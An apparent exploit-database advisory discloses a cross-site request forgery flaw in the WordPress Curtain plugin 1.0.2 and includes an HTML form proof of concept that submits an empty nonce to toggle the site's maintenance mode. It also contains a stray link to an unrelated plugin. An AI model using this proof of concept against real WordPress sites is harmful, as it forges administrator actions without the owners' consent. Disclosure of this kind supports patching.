WordPress Curtain plugin version 1.0.2 suffers from a cross site request forgery vulnerability.
f394a443240b0a394250f659b08eabdf25ac27620ce8316b56cf87a0d070fafb
# Exploit Title: WordPress Plugin curtain 1.0.2 - CSRF
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/curtain/
<https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.0.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
## Summary:
Cross site forgery vulnerability has been identified in curtain
WordPress plugin that allows an attacker to to activate or dedicative
sites maintenance mode.
## Vulnerable URL:
http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=
<http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0>1
## CSRF POC Exploit
```
<html>
<body>
<form action="http://localhost:10003/wp-admin/options-general.php">
<input type="hidden" name="page" value="curtain" />
<input type="hidden" name="_wpnonce" value="" />
<input type="hidden" name="mode" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
- To deactivate change mode value to 0